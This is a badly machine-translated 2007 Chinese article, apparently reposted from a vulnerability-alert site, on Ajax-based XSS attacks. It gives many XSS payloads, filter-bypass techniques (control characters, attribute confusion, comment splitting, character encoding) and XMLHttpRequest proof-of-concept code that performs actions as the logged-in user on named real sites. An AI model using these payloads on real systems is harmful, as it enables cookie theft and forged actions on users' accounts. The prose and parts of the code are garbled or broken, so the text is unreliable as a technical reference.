Ajax hacking (Monyer)-vulnerability warning-the black bar safety net

2007-01-12T00:00:00
ID MYHACK58:62200713733
Type myhack58
Reporter 佚名
Modified 2007-01-12T00:00:00

Description

Author: dream light

In the tenth period published the Ajax hacking, the users give me feedback onXSSthe technical aspects of the problem mainly by the following several. For what in Ajax hacking, withXSS for? It with the traditionalXSSwhat's the difference? They each have what the pros and cons of end? Large site of the so-calledXSSvulnerability is tasteless? Below we together to detailed analysis.

Ajax hacking

Ajax hacking this term first appeared in Billy Hoffman's article called the AJAX dangers of the report, he put the samy and yamanner this form of attack is defined as the AJAX hacking it. Whereas before they just is said to belong to the web2. 0 worms orXSSworm, but to this form of attack and there is no one clear definition. Here we temporarily to AJax hackingXSSfor some in-depth sexual discussion. On the Ajax other attack forms please go to the online reference to the article the Top 1 0 Ajax Security Holes and Driving Factors of or is the translation into Chinese of the breakdown of the Web2. 0 under the ten security threats action.

In the traditionalXSSattack, our purpose is usually to directly provide the right or access Cookies after the right, so the code implementation is generally the windows. open, window. location or iframe, so it's two big weakness is manifested, does not have propagation resistance and easy exposed. In the AJax hacking, the use of Ajax, this kind of new technologies, attack methods and objects can be transformed. In fact, the vast majority of people in the Get administrator permission with the file after you change the permissions can do is hang horse, very little design trade secrets like that! While this attack is directly to the spearhead means to the client, since all the data is the use of asynchronous transfer mode, so having a strong covert capacity; through the manipulation of the logged-on user permissions can be directly to the user information change, you can even make the code set is automatically propagated to achieve worm functionality.

XSS use

In the propagation of theXSSattack case, the code inserted by the use is generally in the URL and the text area textarea. But for recently a large area of the use of Ajax technology for the establishment of the station site, the use of new forms of Ajax hacking techniques can be the use of way generally extend to the URL field, input field, textarea field, embed domain, css, rss, xml, the carrier of the seven ways.

URL XSS

Can beXSSof the URL is generally the"domain name/file name-a file format for? (Field)=(the content of the field"in this form, and the content of the field will usually be on the page of a certain position is displayed or called. Since the website writer of negligence, did not put the corresponding field ContentsSafety testingand filtered, and the direct call to the page, so that we only put the field content is replaced we want toXSS the code that is generated across the station. For example:

http://club.sohu.com/joke/1.htm? stra=<script>alert(document. cookie);</script> However, this approach generally need to convince a user to click on you beforehand forged the link, and the link you can hang in the forum or to E-mail the way for fishing of deception.

Input and textarea and css XSS

input and textarea and css XSSwe used to in the way most widely used several, since css actually belongs to the Dhtml part, so they use way and bypass the filter characteristics are substantially the same, we will later focus on the relevant interpretation and experimentation.

Embed XSS

Embed XSSthe General use of the in allows the insertion of video, music and flash on the site, if you link to a maliciously constructed containingXSSthe script of the flash file, such as<EMBED SRC="xss. swf"></EMBED>, and then we constructed a special. swf file and the flash file the action in the insert in Action Script lead to js or vbs code. When the user visit the page produces both Cross Station.

Rss and Xml XSS

This attack is generally use in Can for rss aggregation sites as well as some of the local rss interpreter on the supposedly local rss interpreter toXSS, there is obtained the host permissions of the possibility, but I have not tried this!, the But since rss files can generally be at any Station point on the reference, so want to carry out such attacks testing is a very simple thing, the effect is quite obvious. Here is the one without any filter setting of local call the remote rss. the xml instance of the effect, as well as Google calls the rss filtering effect.

Code insert mode

Due to the insertion of the script into js or vbs, all generally needed by the keywords JavaScript, VbScript, expression such as<IMG SRC="JavaScript: alert the'XSS'; to">, but when receiving mouse or keyboard response, these three keywords can be omitted, so the following using the method<img >or<INPUT onkeyup="alert('XSS');">and so on. And because html and does not follow the xhtml standard, so you can have the following Insert methods:

1, the tag property can be used in double quotes, you can use single quotes, you can also don't use the quotes;

2, the attribute value can be uppercase; lowercase; you can also mix write;

3, You can insert a carriage return, including the end of the paragraph at the end and newline of the two, i.e., char(1 0)and char(1 3), tab, space;

4, if it is the style form can also insert a backslash"\", comment operator"/**/"; the

5, may be inserted into the code converted into a 1 0-ary, 1 to 6 of the intake system;

6, due to the prohibition of uncertainty, you insert the hexadecimal string can be a series of conversion and can mix and match combinations thereof;

7, The character"j"can have the following 1 of 5 coding method, and not the character of the case.

\6A\06A\006A\0006A\00006A //java in the form of 1 6-ary encoding

jjjjj //decimal encoded

jjjjj //hexadecimal encoding

8, other encoding methods, such as htmlEncode and URLEncode for html and URL encoding.

As far as can be inserted into the Code of the html tags....... That sentence almost crazy-currently, almost all can be inserted into attributes of the tag can be inserted into the code, such as<bstyle="xss:expression(alert('XSS'))">.

In html tags can be inserted in the code properties are generally as follows: src, style, dynsrc(commonly used in the img and input, using this attribute can also insert video, lowsrc pre-load thumbnails, Mouse Properties, such as the o n m o u s e o v e r, the keyboard attributes such as onkeypress, the href attribute is commonly used to a and link, the boby onload attribute, URL, attribute, etc.

Filter bypass mode

Of course a family website is also impossible to dumb to let you input these codes, so they generally will for you to enter the characters to filter. So we write good code and some will be able to smoothly inserted into the implementation, it is likely some of the key characters are filtered out, such as"JavaScript". If only this simple filter, then the bypass method is really too simple, as long as whenever you enter this character when the input"javajavascriptscript"and the like. Of course, a website programmer will not be so silly, they will be variously filtered to preparedness for you, so combined with the above"code insert mode", you might summarize the following to bypass website filter system methods:

1, with the control characters of the ASCII code of the fill

For example<IMG SRC="; the JavaScript: alert('XSS');"> if you are familiar with the ASCII code, you should know that the system control characters for a total of 3 3, here remove a head(null)and a tail(del), the other 3 1 a character can be smoothly inserted into the code head, the filter system is confused, and does not affect the original code is executed, but you can still use the"code insertion"in the"programme 7"for encoding an arbitrary conversion. Seven tab, newline, carriage returns can be inserted into the code anywhere.

2, Insert confused with attribute

When we performed a General text entry will be found, not all with"JavaSceipt"such characters will be filtered out. But only in the html tags special characters will be filtered out, which makes we have the token set to bypass the measures, in the inserted Code of the attribute previously inserted into another confusing attribute, and the attribute in the Insert to let the filtration system mistake is the label Terminator character, thus allowing the filtration system that the implementation of the code in the html tag the outside. For example:

<img src="abc>" > //insert the confusion of the src attribute

<IMG """><SCRIPT>[code]</SCRIPT>"> //insert the confusion of the double quotes and ">"symbol

<SCRIPT a=">" SRC="xss. js"></SCRIPT> //insert the confusion of a property

3, with the comment character segmentation

Since the browser will ignore each code comment character, so if we are in comments in the code descriptor can successfully deceive the filtration system and does not affectXSScode to run properly. For example:

<img style="xss:expr/XSS/ession([code])"> //css of the comment symbols/**/, where the content will be ignored

<style>@im\port'\ja\vasc\ript:alert("XSS")';</style> //css ignores symbols are"\"

exp/<A STYLE='no\xss:noxss("//");xss:ex/XSS///*/pression (alert("XSS"))'> //comment confused look after

<style><!--& lt;/style><script>[code]//-- ></script> //html of the comment identifier is<!-- Comment-->

4, js coding and call

If the filter system will filter out many of the features of the character, then when we do the above to bypass the time will be very troublesome, so the typical bypass scheme and to the code for the js coding or simply from external calls over. Of course, since the browser on the Ajax security mechanism, you must ensure that the call file on the same server, otherwise there will be error messages.

Asynchronous data call

Since it is Ajax hacking, naturally the need to use asynchronous data calls. Here will simply introduce the relevant knowledge, to more in-depth understanding is a long-term practice results.

1, The Declaration of the xmlhttprequest object

The data call requires prior Declaration of the xmlhttprequest object in IE6 and Previous Versions the most simple approach is:

var XmlHttp=new ActiveXObject("Microsoft. XMLhttp");

In IE7 and firefox in the statement is:

var req = new XMLHttpRequest();

So if we want to compile the better compatibility of the code, can the client browser is determined, and then respectively define the xmlhttprequest object, as follows:

if(window. XMLHttprequest){ XmlHttp = new XMLHttpRequest(); }else if (window. ActiveXObject){ Xmlhttp = new ActiveXObject ('Microsoft. XMLHTTP'); } Then use the following method to pass parameters

XmlHttp. Open("POST","URL",true); XmlHttp. send(null);

Here the idea is that the XmlHttp. Open the first option as the page of the request for post, get, head three the third option true indicates asynchronous mode, false means synchronous mode.

Using the above code, you can simple achieve the look in the TOM blog for current users to add any user to the affiliate link, if added successfully it will return OK to the window that has been added will be returned friended, the code is as follows:

<script> var XmlHttp=new ActiveXObject ("Microsoft. XMLhttp"); XmlHttp. Open("POST","http://blog.tom.com/manage/favorite/friend_list.php? UserName=monyer1&Flag=1",true); XmlHttp. send(null) XmlHttp. onreadystatechange=ServerProcess; function ServerProcess(){ if (Xmlhttp. readystate==4 || XmlHttp. readystate=='complete') alert (XmlHttp. responsetext); } </script> Using the same principle, to login the user to add the article also is not what problem, just a little trouble in store only, interested friends can be to own to go back to try.

V b s c r i p t declared in the xmlhttprequest code is this:

dim httpreq as msxml. xmlhttprequest set httpreq = new xmlhttprequest httpreq. setrequesttheader "content - type:","text/xml;dust=gb2312" httpreq,send The use of a way with js much the same, here not to do too much instantly.

2, Get page elements

Get the page specified label and the label value will generally use the following DOM object, of course, behind the object can be added to the relevant attribute, such as style, value, innerHTML, and so on.

1)The document. getElementByld //get the devise id of the html tag related information

2)The document. getElementByname //get the specified name of the html tag related information

3)The document. getElementByTagName //get the specified html tag related information

3, in the page insert the html element

My guidance can be in the page insert the html of the js function insertAdjacentHTML, and innerHTML(outerHTML, the inserAdjacentText, the innerTEXT outerTEXT it. Of which the first two are inserted into the html code, The latter two are inserted into the text, so we generally used is the first two. In addition with the document object in the createlement can also be achieved the code is inserted, input the js code, note the capitalization issue.

1)<a href="#" >innerHTML</a> //replace the current label of the content, the scope does not include the current html tag

2)<a href="#" >outerHTML</a> //replace the current label and label of content, the role of the domain, including when the front tag and all the content

3)<a href="#">insertAdjacentHTML</a> //the newly inserted html code, not change the original label and contents

To specify the insertion of html tags in the statement of the place, there are four values available:

a. beforeBegin: insert to tag the start tag after the

b. afterBegin: insert to tag the start tag after the

c. beforeEnd: insert the tag end of the tag before

d. afterEnd: insert the tag end of the tag after the

Flexibility in the use of these two functions can help us transform a rich effect, I use Baidu space into a video to simplify the POC of:

Html page code is:

<script scr=monyerflash. js></script> <address>src=http:/ /tv.mofile.com/cn/xplayer.swf?v=9IWKFISE</address> monyerflash. the js code is:

windwo. onload=function(){ var i,j,x,y,z; j=document. getElementsByTagName ('address'); for(i=0;i<j. length;i++){ y=document. getElementsByTagName('address') [i]; z=document. getElementsByTagName('address') [i]; firstChild. data; x='<br/><embed '+z+'></embed>'; if(y) y. insertAdjacentHTML('beforeEnd'. x); }} Summary

Have outlined above, I believe you are on Ajax hacking with XSShave a General understanding, and as long as the text of the response should be content of the simple combinations and changes, it is possible to make some amazing things. Of course, because Ajax applications is JavaScript part, so you want to make use of Ajax-style hacking and play The its power also need your JavaScript to have a full understanding. When you are in each of the filtration systems between the combat, you will encounter more suffering and the need to try to solve various problems. I think that if a real invasion of a network station or a smooth hung it is of secondary importance, and constantly improve themselves, in power and the anti-opposites continue to seek a breakthrough is king!